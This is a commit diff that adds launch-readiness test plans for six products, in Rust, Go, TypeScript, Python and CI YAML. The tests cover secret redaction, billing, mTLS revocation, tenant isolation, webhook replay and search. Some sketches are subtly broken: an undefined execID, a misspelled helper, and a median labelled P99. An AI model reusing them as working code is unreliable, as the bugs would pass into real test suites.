Implement BMad Must-Have Before Launch fixes for all 6 products
P1: API key redaction, SSE billing leak, token math edge cases, CI runner config P2: mTLS revocation lockout, terraform state lock recovery, RLS pool leak, entropy scrubber, pgmq visibility P3: HMAC replay prevention, cross-tenant negative tests, correlation window edge cases, SQS claim-check, free tier P4: Discovery partial failure recovery, ownership conflict integration test, VCR freshness CI, Meilisearch rebuild, Cmd+K latency P5: Concurrent baseline conflicts, remediation RBAC, Clock interface for governance, 10K property-based runs, Redis panic fallback P6: Cryptographic agent update signatures, streaming audit logs with WAL, shell AST parsing (mvdan/sh), intervention deadlock TTL, canary suite CI gate
This commit is contained in:
@@ -2551,3 +2551,167 @@ async fn panic_mode_allowed_for_owner_role() {
|
||||
```
|
||||
|
||||
*End of P1 Review Remediation Addendum*
|
||||
|
||||
---
|
||||
|
||||
## 12. BMad Review Implementation (Must-Have Before Launch)
|
||||
|
||||
### 12.1 API Key Redaction in Panic Traces
|
||||
|
||||
```rust
|
||||
// tests/security/key_redaction_test.rs
|
||||
|
||||
#[test]
|
||||
fn panic_handler_redacts_bearer_tokens_from_stack_trace() {
|
||||
// Simulate a panic inside the proxy handler while processing a request
|
||||
// with Authorization: Bearer sk-live-abc123
|
||||
let result = std::panic::catch_unwind(|| {
|
||||
process_request_with_panic("Bearer sk-live-abc123");
|
||||
});
|
||||
assert!(result.is_err());
|
||||
|
||||
// Capture the panic message
|
||||
let panic_msg = get_last_panic_message();
|
||||
assert!(!panic_msg.contains("sk-live-abc123"),
|
||||
"Panic trace contains raw API key!");
|
||||
assert!(panic_msg.contains("[REDACTED]") || !panic_msg.contains("sk-"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn error_log_redacts_provider_api_keys() {
|
||||
// Simulate an upstream error that includes the provider key in the response
|
||||
let error_body = r#"{"error": "Invalid API key: sk-proj-abc123xyz"}"#;
|
||||
let sanitized = redact_sensitive_fields(error_body);
|
||||
assert!(!sanitized.contains("sk-proj-abc123xyz"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn telemetry_event_never_contains_raw_api_key() {
|
||||
let event = create_telemetry_event("Bearer sk-live-secret", "gpt-4o", 100, 50);
|
||||
let serialized = serde_json::to_string(&event).unwrap();
|
||||
assert!(!serialized.contains("sk-live-secret"));
|
||||
assert!(!serialized.contains("Bearer"));
|
||||
}
|
||||
```
|
||||
|
||||
### 12.2 SSE Billing Leak Prevention (Expanded)
|
||||
|
||||
```rust
|
||||
#[tokio::test]
|
||||
async fn sse_disconnect_bills_only_streamed_tokens() {
|
||||
let stack = E2EStack::start().await;
|
||||
let mock = stack.mock_provider();
|
||||
|
||||
// Provider will stream 100 tokens at 1/sec
|
||||
mock.configure_slow_stream(100, Duration::from_millis(100));
|
||||
|
||||
// Client reads 10 tokens then disconnects
|
||||
let mut stream = stack.proxy_stream(&chat_request_streaming()).await;
|
||||
let mut received = 0;
|
||||
while let Some(chunk) = stream.next().await {
|
||||
received += count_tokens_in_chunk(&chunk);
|
||||
if received >= 10 { break; }
|
||||
}
|
||||
drop(stream);
|
||||
|
||||
tokio::time::sleep(Duration::from_millis(500)).await;
|
||||
|
||||
// Billing must reflect only streamed tokens
|
||||
let usage = stack.get_last_usage_record().await;
|
||||
assert!(usage.completion_tokens <= 15, // small buffer for in-flight
|
||||
"Billed {} tokens but only streamed ~10", usage.completion_tokens);
|
||||
|
||||
// Provider connection must be aborted
|
||||
assert_eq!(mock.active_connections(), 0);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn sse_disconnect_during_prompt_processing_bills_zero_completion() {
|
||||
// Client disconnects before any completion tokens are generated
|
||||
// (provider is still processing the prompt)
|
||||
let stack = E2EStack::start().await;
|
||||
let mock = stack.mock_provider();
|
||||
mock.configure_delay_before_first_token(Duration::from_secs(5));
|
||||
|
||||
let stream = stack.proxy_stream(&chat_request_streaming()).await;
|
||||
tokio::time::sleep(Duration::from_millis(100)).await;
|
||||
drop(stream); // Disconnect before first token
|
||||
|
||||
let usage = stack.get_last_usage_record().await;
|
||||
assert_eq!(usage.completion_tokens, 0);
|
||||
// Prompt tokens may still be billed (provider processed them)
|
||||
}
|
||||
```
|
||||
|
||||
### 12.3 Token Calculation Edge Cases
|
||||
|
||||
```rust
|
||||
#[test]
|
||||
fn tokenizer_handles_unicode_emoji_correctly() {
|
||||
// cl100k_base tokenizes emoji differently than ASCII
|
||||
let text = "Hello 🌍🔥 world";
|
||||
let tokens = count_tokens_cl100k(text);
|
||||
assert!(tokens > 3); // Emoji take multiple tokens
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn tokenizer_handles_cjk_characters() {
|
||||
let text = "你好世界";
|
||||
let tokens = count_tokens_cl100k(text);
|
||||
assert!(tokens >= 4); // Each CJK char is typically 1+ tokens
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn cost_calculation_matches_provider_billing() {
|
||||
// Property test: our token count * rate must match what the provider reports
|
||||
// within a 1% tolerance (tokenizer version differences)
|
||||
fc::assert(fc::property(
|
||||
fc::string_of(fc::any::<char>(), 1..1000),
|
||||
|text| {
|
||||
let our_count = count_tokens_cl100k(&text);
|
||||
let provider_count = mock_provider_token_count(&text);
|
||||
let diff = (our_count as f64 - provider_count as f64).abs();
|
||||
diff / provider_count as f64 <= 0.01
|
||||
}
|
||||
));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn anthropic_tokenizer_differs_from_openai() {
|
||||
// Same text, different token counts — billing must use the correct tokenizer
|
||||
let text = "The quick brown fox jumps over the lazy dog";
|
||||
let openai_tokens = count_tokens_cl100k(text);
|
||||
let anthropic_tokens = count_tokens_claude(text);
|
||||
// They WILL differ — verify we use the right one per provider
|
||||
assert_ne!(openai_tokens, anthropic_tokens);
|
||||
}
|
||||
```
|
||||
|
||||
### 12.4 Dedicated CI Runner for Latency Benchmarks
|
||||
|
||||
```yaml
|
||||
# .github/workflows/benchmark.yml
|
||||
# Runs on self-hosted runner (Brian's NAS) — not shared GitHub Actions
|
||||
name: Latency Benchmark
|
||||
on:
|
||||
push:
|
||||
branches: [main]
|
||||
paths: ['src/proxy/**']
|
||||
|
||||
jobs:
|
||||
benchmark:
|
||||
runs-on: self-hosted # Brian's NAS with consistent CPU
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
- name: Run proxy latency benchmark
|
||||
run: cargo bench --bench proxy_latency
|
||||
- name: Assert P99 < 5ms
|
||||
run: |
|
||||
P99=$(cat target/criterion/proxy_overhead/new/estimates.json | jq '.median.point_estimate')
|
||||
if (( $(echo "$P99 > 5000000" | bc -l) )); then
|
||||
echo "P99 latency ${P99}ns exceeds 5ms budget"
|
||||
exit 1
|
||||
fi
|
||||
```
|
||||
|
||||
*End of P1 BMad Implementation*
|
||||
|
||||
@@ -2094,3 +2094,208 @@ Per review recommendation, cap E2E at 10 critical paths. Remaining 40 tests push
|
||||
| E2E/Smoke | 10% (~50) | 7% (~35) | Capped at 10 true E2E + 25 Playwright UI tests |
|
||||
|
||||
*End of P2 Review Remediation Addendum*
|
||||
|
||||
---
|
||||
|
||||
## 12. BMad Review Implementation (Must-Have Before Launch)
|
||||
|
||||
### 12.1 mTLS Revocation — Instant Lockout
|
||||
|
||||
```go
|
||||
// tests/integration/mtls_revocation_test.go
|
||||
|
||||
func TestRevokedCert_ExistingConnectionDropped(t *testing.T) {
|
||||
// 1. Agent connects with valid cert
|
||||
agent := connectAgentWithCert(t, validCert)
|
||||
assert.True(t, agent.IsConnected())
|
||||
|
||||
// 2. Revoke the cert via CRL update
|
||||
revokeCert(t, validCert.SerialNumber)
|
||||
|
||||
// 3. Force CRL refresh on SaaS (< 30 seconds)
|
||||
triggerCRLRefresh(t)
|
||||
|
||||
// 4. Existing connection must be terminated
|
||||
time.Sleep(5 * time.Second)
|
||||
assert.False(t, agent.IsConnected(),
|
||||
"Revoked agent still has active mTLS connection — cached session not cleared")
|
||||
}
|
||||
|
||||
func TestRevokedCert_NewConnectionRejected(t *testing.T) {
|
||||
revokeCert(t, validCert.SerialNumber)
|
||||
triggerCRLRefresh(t)
|
||||
|
||||
_, err := connectAgentWithCert(t, validCert)
|
||||
assert.Error(t, err)
|
||||
assert.Contains(t, err.Error(), "certificate revoked")
|
||||
}
|
||||
|
||||
func TestPayloadReplay_RejectedByNonce(t *testing.T) {
|
||||
// Capture a legitimate drift report
|
||||
report := captureValidDriftReport(t)
|
||||
|
||||
// Replay it
|
||||
resp := postDriftReport(t, report)
|
||||
assert.Equal(t, 409, resp.StatusCode) // Conflict — nonce already used
|
||||
}
|
||||
```
|
||||
|
||||
### 12.2 Terraform State Lock Recovery on Panic
|
||||
|
||||
```go
|
||||
// tests/integration/remediation_panic_test.go
|
||||
|
||||
func TestPanicMode_ReleasesTerraformStateLock(t *testing.T) {
|
||||
// 1. Start a remediation (terraform apply)
|
||||
execID := startRemediation(t, "stack-1", "drift-1")
|
||||
waitForState(t, execID, "applying")
|
||||
|
||||
// 2. Verify state lock is held
|
||||
lockInfo := getTerraformStateLock(t, "stack-1")
|
||||
assert.NotNil(t, lockInfo, "State lock should be held during apply")
|
||||
|
||||
// 3. Trigger panic mode
|
||||
triggerPanicMode(t)
|
||||
|
||||
// 4. Wait for agent to abort
|
||||
waitForState(t, execID, "aborted")
|
||||
|
||||
// 5. State lock MUST be released
|
||||
lockInfo = getTerraformStateLock(t, "stack-1")
|
||||
assert.Nil(t, lockInfo,
|
||||
"Terraform state lock not released after panic — infrastructure is now in zombie state")
|
||||
}
|
||||
|
||||
func TestPanicMode_AgentRunsTerraformForceUnlock(t *testing.T) {
|
||||
// If normal unlock fails, agent must run `terraform force-unlock`
|
||||
startRemediation(t, "stack-1", "drift-1")
|
||||
waitForState(t, execID, "applying")
|
||||
|
||||
// Simulate lock that can't be released normally
|
||||
corruptStateLock(t, "stack-1")
|
||||
triggerPanicMode(t)
|
||||
|
||||
// Agent should attempt force-unlock
|
||||
logs := getAgentLogs(t)
|
||||
assert.Contains(t, logs, "terraform force-unlock")
|
||||
}
|
||||
```
|
||||
|
||||
### 12.3 RLS Connection Pool Leak Test
|
||||
|
||||
```go
|
||||
// tests/integration/rls_pool_leak_test.go
|
||||
|
||||
func TestPgBouncer_ClearsTenantContext_BetweenRequests(t *testing.T) {
|
||||
t.Parallel()
|
||||
|
||||
// 1. Request as Tenant A — sets SET LOCAL app.tenant_id = 'tenant-a'
|
||||
respA := apiRequest(t, tenantAToken, "GET", "/v1/stacks")
|
||||
assert.Equal(t, 200, respA.StatusCode)
|
||||
stacksA := parseStacks(respA)
|
||||
|
||||
// 2. Immediately request as Tenant B on same PgBouncer connection
|
||||
respB := apiRequest(t, tenantBToken, "GET", "/v1/stacks")
|
||||
assert.Equal(t, 200, respB.StatusCode)
|
||||
stacksB := parseStacks(respB)
|
||||
|
||||
// 3. Tenant B must NOT see Tenant A's stacks
|
||||
for _, stack := range stacksB {
|
||||
assert.NotEqual(t, "tenant-a", stack.TenantID,
|
||||
"CRITICAL: Tenant B received Tenant A's data — PgBouncer leaked context")
|
||||
}
|
||||
}
|
||||
|
||||
func TestRLS_100ConcurrentTenants_NoLeakage(t *testing.T) {
|
||||
// Stress test: 100 concurrent requests from different tenants
|
||||
var wg sync.WaitGroup
|
||||
violations := make(chan string, 100)
|
||||
|
||||
for i := 0; i < 100; i++ {
|
||||
wg.Add(1)
|
||||
go func(tenantID string) {
|
||||
defer wg.Done()
|
||||
token := createTenantToken(t, tenantID)
|
||||
resp := apiRequest(t, token, "GET", "/v1/stacks")
|
||||
stacks := parseStacks(resp)
|
||||
for _, s := range stacks {
|
||||
if s.TenantID != tenantID {
|
||||
violations <- fmt.Sprintf("Tenant %s saw data from %s", tenantID, s.TenantID)
|
||||
}
|
||||
}
|
||||
}(fmt.Sprintf("tenant-%d", i))
|
||||
}
|
||||
wg.Wait()
|
||||
close(violations)
|
||||
|
||||
for v := range violations {
|
||||
t.Fatal("CROSS-TENANT LEAK:", v)
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### 12.4 Secret Scrubber Entropy Scanning
|
||||
|
||||
```go
|
||||
// pkg/agent/scrubber/entropy_test.go
|
||||
|
||||
func TestEntropyScan_DetectsBase64EncodedAWSKey(t *testing.T) {
|
||||
// AWS key base64-encoded inside a JSON block
|
||||
input := `{"config": "` + base64.StdEncoding.EncodeToString([]byte("AKIAIOSFODNN7EXAMPLE")) + `"}`
|
||||
result := scrubber.Scrub(input)
|
||||
assert.NotContains(t, result, "AKIAIOSFODNN7EXAMPLE")
|
||||
}
|
||||
|
||||
func TestEntropyScan_DetectsMultiLineRSAKey(t *testing.T) {
|
||||
input := `-----BEGIN RSA PRIVATE KEY-----
|
||||
MIIEpAIBAAKCAQEA0Z3VS5JJcds3xfn/ygWyF8PbnGy5AhJPnUfGqlTlGa...
|
||||
-----END RSA PRIVATE KEY-----`
|
||||
result := scrubber.Scrub(input)
|
||||
assert.Contains(t, result, "[REDACTED RSA KEY]")
|
||||
}
|
||||
|
||||
func TestEntropyScan_DetectsHighEntropyCustomToken(t *testing.T) {
|
||||
// 40-char hex string that looks like a custom API token
|
||||
token := "a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0"
|
||||
input := fmt.Sprintf(`{"api_token": "%s"}`, token)
|
||||
result := scrubber.Scrub(input)
|
||||
// Shannon entropy > 3.5 bits/char should trigger redaction
|
||||
assert.NotContains(t, result, token)
|
||||
}
|
||||
|
||||
func TestEntropyScan_DoesNotRedactNormalText(t *testing.T) {
|
||||
input := `{"message": "Hello world, this is a normal log message"}`
|
||||
result := scrubber.Scrub(input)
|
||||
assert.Equal(t, input, result) // No false positives
|
||||
}
|
||||
```
|
||||
|
||||
### 12.5 pgmq Visibility Timeout for Long Scans
|
||||
|
||||
```go
|
||||
// tests/integration/pgmq_visibility_test.go
|
||||
|
||||
func TestPgmq_LongScan_DoesNotTriggerDuplicateProcessing(t *testing.T) {
|
||||
// Simulate a scan that takes 5 minutes
|
||||
queue := setupPgmqQueue(t)
|
||||
|
||||
// Enqueue a drift report
|
||||
queue.Send(t, makeDriftReport("stack-1"))
|
||||
|
||||
// Consumer 1 picks it up with 2-minute visibility timeout
|
||||
msg := queue.Read(t, 120) // 120s visibility
|
||||
assert.NotNil(t, msg)
|
||||
|
||||
// Simulate long processing (extend visibility)
|
||||
for i := 0; i < 3; i++ {
|
||||
time.Sleep(90 * time.Second)
|
||||
queue.ExtendVisibility(t, msg.ID, 120) // Extend by another 2 min
|
||||
}
|
||||
|
||||
// Consumer 2 should NOT get the same message
|
||||
msg2 := queue.Read(t, 120)
|
||||
assert.Nil(t, msg2, "pgmq handed job to second worker while first was still processing")
|
||||
}
|
||||
```
|
||||
|
||||
*End of P2 BMad Implementation*
|
||||
|
||||
@@ -1865,3 +1865,227 @@ describe('Slack Notification Circuit Breaker', () => {
|
||||
| E2E | 10% (~20) | 10% (~28) | Dashboard UI (Playwright), onboarding flow |
|
||||
|
||||
*End of P3 Review Remediation Addendum*
|
||||
|
||||
---
|
||||
|
||||
## 12. BMad Review Implementation (Must-Have Before Launch)
|
||||
|
||||
### 12.1 HMAC Timestamp Freshness (Replay Attack Prevention)
|
||||
|
||||
```typescript
|
||||
describe('HMAC Replay Attack Prevention', () => {
|
||||
it('rejects Datadog webhook with timestamp older than 5 minutes', async () => {
|
||||
const payload = makeDatadogPayload();
|
||||
const staleTimestamp = Math.floor(Date.now() / 1000) - 301; // 5min + 1s
|
||||
const sig = computeDatadogHMAC(payload, staleTimestamp);
|
||||
|
||||
const resp = await ingest(payload, {
|
||||
'dd-webhook-timestamp': staleTimestamp.toString(),
|
||||
'dd-webhook-signature': sig,
|
||||
});
|
||||
expect(resp.status).toBe(401);
|
||||
expect(resp.body.error).toContain('stale timestamp');
|
||||
});
|
||||
|
||||
it('rejects PagerDuty webhook with missing timestamp', async () => {
|
||||
const payload = makePagerDutyPayload();
|
||||
const sig = computePagerDutyHMAC(payload);
|
||||
|
||||
const resp = await ingest(payload, {
|
||||
'x-pagerduty-signature': sig,
|
||||
// No timestamp header
|
||||
});
|
||||
expect(resp.status).toBe(401);
|
||||
});
|
||||
|
||||
it('rejects OpsGenie webhook replayed after 5 minutes', async () => {
|
||||
// OpsGenie doesn't always package timestamp cleanly
|
||||
// Must extract from payload body and validate
|
||||
const payload = makeOpsGeniePayload({ timestamp: fiveMinutesAgo() });
|
||||
const sig = computeOpsGenieHMAC(payload);
|
||||
|
||||
const resp = await ingest(payload, { 'x-opsgenie-signature': sig });
|
||||
expect(resp.status).toBe(401);
|
||||
});
|
||||
|
||||
it('accepts fresh webhook within 5-minute window', async () => {
|
||||
const payload = makeDatadogPayload();
|
||||
const freshTimestamp = Math.floor(Date.now() / 1000);
|
||||
const sig = computeDatadogHMAC(payload, freshTimestamp);
|
||||
|
||||
const resp = await ingest(payload, {
|
||||
'dd-webhook-timestamp': freshTimestamp.toString(),
|
||||
'dd-webhook-signature': sig,
|
||||
});
|
||||
expect(resp.status).toBe(200);
|
||||
});
|
||||
});
|
||||
```
|
||||
|
||||
### 12.2 Cross-Tenant Negative Isolation Tests
|
||||
|
||||
```typescript
|
||||
describe('DynamoDB Tenant Isolation (Negative Tests)', () => {
|
||||
it('Tenant A cannot read Tenant B incidents', async () => {
|
||||
// Seed data for both tenants
|
||||
await createIncident('tenant-a', { title: 'A incident' });
|
||||
await createIncident('tenant-b', { title: 'B incident' });
|
||||
|
||||
// Query as Tenant A
|
||||
const results = await dao.listIncidents('tenant-a');
|
||||
|
||||
// Explicitly assert Tenant B data is absent
|
||||
const tenantIds = results.map(r => r.tenantId);
|
||||
expect(tenantIds).not.toContain('tenant-b');
|
||||
expect(results.every(r => r.tenantId === 'tenant-a')).toBe(true);
|
||||
});
|
||||
|
||||
it('Tenant A cannot read Tenant B analytics', async () => {
|
||||
await seedAnalytics('tenant-a', { alertCount: 100 });
|
||||
await seedAnalytics('tenant-b', { alertCount: 200 });
|
||||
|
||||
const analytics = await dao.getAnalytics('tenant-a');
|
||||
expect(analytics.alertCount).toBe(100); // Not 300 (combined)
|
||||
});
|
||||
|
||||
it('API returns 404 (not 403) for cross-tenant incident access', async () => {
|
||||
const incident = await createIncident('tenant-b', { title: 'secret' });
|
||||
|
||||
const resp = await api.get(`/v1/incidents/${incident.id}`)
|
||||
.set('Authorization', `Bearer ${tenantAToken}`);
|
||||
|
||||
// 404 not 403 — don't leak existence
|
||||
expect(resp.status).toBe(404);
|
||||
});
|
||||
});
|
||||
```
|
||||
|
||||
### 12.3 Correlation Window Edge Cases
|
||||
|
||||
```typescript
|
||||
describe('Out-of-Order Alert Delivery', () => {
|
||||
it('late alert attaches to existing incident (not duplicate)', async () => {
|
||||
const clock = new FakeClock();
|
||||
const engine = new CorrelationEngine(new InMemoryWindowStore(), clock);
|
||||
|
||||
// Alert 1 arrives at T=0
|
||||
const alert1 = makeAlert({ service: 'auth', fingerprint: 'cpu-high', timestamp: 0 });
|
||||
const incident1 = await engine.process(alert1);
|
||||
|
||||
// Window closes at T=5min, incident shipped
|
||||
clock.advanceBy(5 * 60 * 1000);
|
||||
await engine.flushWindows();
|
||||
|
||||
// Late alert arrives at T=6min with timestamp T=2min (within original window)
|
||||
const lateAlert = makeAlert({ service: 'auth', fingerprint: 'cpu-high', timestamp: 2 * 60 * 1000 });
|
||||
const result = await engine.process(lateAlert);
|
||||
|
||||
// Must attach to existing incident, not create new one
|
||||
expect(result.incidentId).toBe(incident1.incidentId);
|
||||
expect(result.action).toBe('attached_to_existing');
|
||||
});
|
||||
|
||||
it('very late alert (>2x window) creates new incident', async () => {
|
||||
const clock = new FakeClock();
|
||||
const engine = new CorrelationEngine(new InMemoryWindowStore(), clock);
|
||||
|
||||
const alert1 = makeAlert({ service: 'auth', fingerprint: 'cpu-high' });
|
||||
const incident1 = await engine.process(alert1);
|
||||
|
||||
// 15 minutes later (3x the 5-min window)
|
||||
clock.advanceBy(15 * 60 * 1000);
|
||||
|
||||
const lateAlert = makeAlert({ service: 'auth', fingerprint: 'cpu-high' });
|
||||
const result = await engine.process(lateAlert);
|
||||
|
||||
expect(result.incidentId).not.toBe(incident1.incidentId);
|
||||
expect(result.action).toBe('new_incident');
|
||||
});
|
||||
});
|
||||
```
|
||||
|
||||
### 12.4 SQS Claim-Check Round-Trip
|
||||
|
||||
```typescript
|
||||
describe('SQS 256KB Claim-Check End-to-End', () => {
|
||||
it('large payload round-trips through S3 pointer', async () => {
|
||||
const largePayload = makeLargeAlertPayload(300 * 1024); // 300KB
|
||||
|
||||
// Ingestion compresses and stores in S3
|
||||
const resp = await ingest(largePayload);
|
||||
expect(resp.status).toBe(200);
|
||||
|
||||
// SQS message contains S3 pointer
|
||||
const sqsMsg = await getLastSQSMessage(localstack, 'alert-queue');
|
||||
const body = JSON.parse(sqsMsg.Body);
|
||||
expect(body.s3Pointer).toBeDefined();
|
||||
|
||||
// Correlation engine fetches from S3 and processes
|
||||
const incident = await waitForIncidentCreated(5000);
|
||||
expect(incident).toBeDefined();
|
||||
expect(incident.sourceAlertCount).toBeGreaterThan(0);
|
||||
});
|
||||
|
||||
it('S3 fetch timeout does not crash correlation engine', async () => {
|
||||
// Inject S3 latency (10 second delay)
|
||||
mockS3.setLatency(10000);
|
||||
|
||||
const largePayload = makeLargeAlertPayload(300 * 1024);
|
||||
await ingest(largePayload);
|
||||
|
||||
// Correlation engine should timeout and send to DLQ
|
||||
const dlqMsg = await getDLQMessage(localstack, 'alert-dlq', 15000);
|
||||
expect(dlqMsg).toBeDefined();
|
||||
|
||||
// Engine is still healthy
|
||||
const health = await api.get('/health');
|
||||
expect(health.status).toBe(200);
|
||||
});
|
||||
});
|
||||
```
|
||||
|
||||
### 12.5 Free Tier Enforcement
|
||||
|
||||
```typescript
|
||||
describe('Free Tier (10K alerts/month, 7-day retention)', () => {
|
||||
it('accepts alert at 9,999 count', async () => {
|
||||
await setAlertCounter('tenant-free', 9999);
|
||||
const resp = await ingestAsTenat('tenant-free', makeAlert());
|
||||
expect(resp.status).toBe(200);
|
||||
});
|
||||
|
||||
it('rejects alert at 10,001 with upgrade prompt', async () => {
|
||||
await setAlertCounter('tenant-free', 10000);
|
||||
const resp = await ingestAsTenant('tenant-free', makeAlert());
|
||||
expect(resp.status).toBe(429);
|
||||
expect(resp.body.upgrade_url).toContain('stripe');
|
||||
});
|
||||
|
||||
it('counter resets on first of month', async () => {
|
||||
await setAlertCounter('tenant-free', 10000);
|
||||
clock.advanceToFirstOfNextMonth();
|
||||
await runMonthlyReset();
|
||||
|
||||
const resp = await ingestAsTenant('tenant-free', makeAlert());
|
||||
expect(resp.status).toBe(200);
|
||||
});
|
||||
|
||||
it('purges data older than 7 days on free tier', async () => {
|
||||
await createIncident('tenant-free', { createdAt: eightDaysAgo() });
|
||||
await runRetentionPurge();
|
||||
|
||||
const incidents = await dao.listIncidents('tenant-free');
|
||||
expect(incidents).toHaveLength(0);
|
||||
});
|
||||
|
||||
it('retains data for 90 days on pro tier', async () => {
|
||||
await createIncident('tenant-pro', { createdAt: thirtyDaysAgo() });
|
||||
await runRetentionPurge();
|
||||
|
||||
const incidents = await dao.listIncidents('tenant-pro');
|
||||
expect(incidents).toHaveLength(1);
|
||||
});
|
||||
});
|
||||
```
|
||||
|
||||
*End of P3 BMad Implementation*
|
||||
|
||||
@@ -1265,3 +1265,225 @@ def test_meilisearch_index_rebuild_does_not_drop_search():
|
||||
# Verify zero-downtime index swapping during mapping updates
|
||||
pass
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 12. BMad Review Implementation (Must-Have Before Launch)
|
||||
|
||||
### 12.1 Discovery Scan Timeout / Partial Failure Recovery
|
||||
|
||||
```python
|
||||
# tests/integration/test_discovery_resilience.py
|
||||
|
||||
def test_partial_aws_scan_does_not_delete_existing_services():
|
||||
"""If AWS scanner times out after discovering 500 of 1000 resources,
|
||||
existing catalog entries must NOT be marked stale or deleted."""
|
||||
|
||||
# Seed catalog with 1000 services
|
||||
seed_catalog(count=1000)
|
||||
|
||||
# Simulate scanner timeout after 500 resources
|
||||
with mock_aws_timeout_after(500):
|
||||
result = run_aws_discovery_scan()
|
||||
|
||||
assert result.status == "partial_failure"
|
||||
assert result.discovered == 500
|
||||
|
||||
# All 1000 services must still exist in catalog
|
||||
services = catalog_api.list_services()
|
||||
assert len(services) == 1000 # NOT 500
|
||||
|
||||
# Partial results should be staged, not committed
|
||||
staged = catalog_api.list_staged_updates()
|
||||
assert len(staged) == 500
|
||||
|
||||
def test_partial_github_scan_does_not_corrupt_ownership():
|
||||
"""If GitHub scanner hits rate limit mid-scan, existing ownership
|
||||
mappings must be preserved."""
|
||||
|
||||
seed_catalog_with_ownership(count=100)
|
||||
|
||||
with mock_github_rate_limit_after(50):
|
||||
result = run_github_discovery_scan()
|
||||
|
||||
assert result.status == "partial_failure"
|
||||
|
||||
# All 100 ownership mappings intact
|
||||
services = catalog_api.list_services()
|
||||
owned = [s for s in services if s.owner is not None]
|
||||
assert len(owned) == 100 # NOT 50
|
||||
|
||||
def test_scan_failure_triggers_alert_not_silent_failure():
|
||||
result = run_aws_discovery_scan_with_invalid_credentials()
|
||||
assert result.status == "failed"
|
||||
|
||||
# Must alert the admin
|
||||
alerts = get_admin_alerts()
|
||||
assert any("discovery scan failed" in a.message for a in alerts)
|
||||
```
|
||||
|
||||
### 12.2 Ownership Conflict Resolution Integration Test
|
||||
|
||||
```python
|
||||
# tests/integration/test_ownership_conflict.py
|
||||
|
||||
def test_explicit_config_overrides_implicit_tag():
|
||||
"""Explicit (CODEOWNERS/config) > Implicit (AWS tags) > Heuristic (commits)"""
|
||||
|
||||
# AWS tag says owner is "team-infra"
|
||||
aws_scanner.discover_service("auth-api", owner_tag="team-infra")
|
||||
|
||||
# GitHub CODEOWNERS says owner is "team-platform"
|
||||
github_scanner.discover_service("auth-api", codeowners="team-platform")
|
||||
|
||||
# Resolve conflict
|
||||
service = catalog_api.get_service("auth-api")
|
||||
assert service.owner == "team-platform" # Explicit wins
|
||||
assert service.owner_source == "codeowners"
|
||||
|
||||
def test_concurrent_discovery_sources_do_not_race():
|
||||
"""Two scanners discovering the same service simultaneously
|
||||
must not create duplicate entries."""
|
||||
|
||||
import asyncio
|
||||
|
||||
async def run_both():
|
||||
await asyncio.gather(
|
||||
aws_scanner.discover_service_async("billing-api"),
|
||||
github_scanner.discover_service_async("billing-api"),
|
||||
)
|
||||
|
||||
asyncio.run(run_both())
|
||||
|
||||
services = catalog_api.search("billing-api")
|
||||
assert len(services) == 1 # No duplicates
|
||||
|
||||
def test_heuristic_ownership_does_not_override_explicit():
|
||||
# Explicit owner set via config
|
||||
catalog_api.set_owner("auth-api", "team-platform", source="config")
|
||||
|
||||
# Heuristic scanner infers different owner from commit history
|
||||
github_scanner.infer_ownership("auth-api", top_committer="dev@other-team.com")
|
||||
|
||||
service = catalog_api.get_service("auth-api")
|
||||
assert service.owner == "team-platform" # Explicit preserved
|
||||
```
|
||||
|
||||
### 12.3 VCR Cassette Freshness Validation
|
||||
|
||||
```yaml
|
||||
# .github/workflows/vcr-refresh.yml
|
||||
# Weekly job to re-record VCR cassettes against real AWS
|
||||
name: VCR Cassette Freshness
|
||||
on:
|
||||
schedule:
|
||||
- cron: '0 6 * * 1' # Every Monday 6 AM UTC
|
||||
|
||||
jobs:
|
||||
refresh:
|
||||
runs-on: self-hosted
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
- name: Re-record cassettes
|
||||
env:
|
||||
AWS_ACCESS_KEY_ID: ${{ secrets.VCR_AWS_KEY }}
|
||||
AWS_SECRET_ACCESS_KEY: ${{ secrets.VCR_AWS_SECRET }}
|
||||
run: |
|
||||
VCR_RECORD=all pytest tests/integration/scanners/ -v
|
||||
- name: Diff cassettes
|
||||
run: |
|
||||
git diff --stat tests/cassettes/
|
||||
CHANGED=$(git diff --name-only tests/cassettes/ | wc -l)
|
||||
if [ "$CHANGED" -gt 0 ]; then
|
||||
echo "⚠️ $CHANGED cassettes changed — AWS API responses have drifted"
|
||||
echo "Review and commit updated cassettes"
|
||||
fi
|
||||
- name: Create PR if cassettes changed
|
||||
uses: peter-evans/create-pull-request@v6
|
||||
with:
|
||||
title: "chore: refresh VCR cassettes (AWS API drift)"
|
||||
branch: vcr-refresh
|
||||
```
|
||||
|
||||
### 12.4 Meilisearch Zero-Downtime Index Rebuild
|
||||
|
||||
```python
|
||||
# tests/integration/test_meilisearch_rebuild.py
|
||||
|
||||
def test_search_returns_results_during_index_rebuild():
|
||||
"""Cmd+K search must work during index rebuild (zero downtime)."""
|
||||
|
||||
# Seed index with 100 services
|
||||
meili.index("services").add_documents(make_services(100))
|
||||
meili.index("services").wait_for_pending_update()
|
||||
|
||||
# Start rebuild (creates services_v2, swaps when ready)
|
||||
rebuild_task = start_index_rebuild()
|
||||
|
||||
# Search must still work during rebuild
|
||||
results = meili.index("services").search("auth")
|
||||
assert len(results["hits"]) > 0
|
||||
|
||||
# Wait for rebuild to complete
|
||||
rebuild_task.wait()
|
||||
|
||||
# Search still works after swap
|
||||
results = meili.index("services").search("auth")
|
||||
assert len(results["hits"]) > 0
|
||||
|
||||
def test_index_rebuild_failure_does_not_corrupt_active_index():
|
||||
meili.index("services").add_documents(make_services(50))
|
||||
|
||||
# Simulate rebuild failure (e.g., OOM during indexing)
|
||||
with mock_meili_oom_during_rebuild():
|
||||
result = start_index_rebuild()
|
||||
|
||||
assert result.status == "failed"
|
||||
|
||||
# Active index must be untouched
|
||||
results = meili.index("services").search("billing")
|
||||
assert len(results["hits"]) > 0 # Still works
|
||||
```
|
||||
|
||||
### 12.5 Cmd+K Search Latency from Redis Cache
|
||||
|
||||
```python
|
||||
# tests/performance/test_search_latency.py
|
||||
|
